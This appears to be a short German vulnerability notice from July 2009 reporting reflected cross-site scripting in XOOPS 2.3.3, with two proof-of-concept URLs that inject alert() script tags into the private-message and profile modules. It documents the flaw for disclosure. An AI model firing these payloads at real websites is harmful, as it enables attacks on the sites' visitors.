Juli 2009: verschiedene URLs ermöglichen XSS
X
http://IP/xoops-2.3.3/htdocs/modules/pm/viewpmsg.php?op='"><script>alert('vulnerable')</script><link id='
http://IP/xoops-2.3.3/htdocs/modules/profile/user.php?"><script>alert('vulnerable')</script>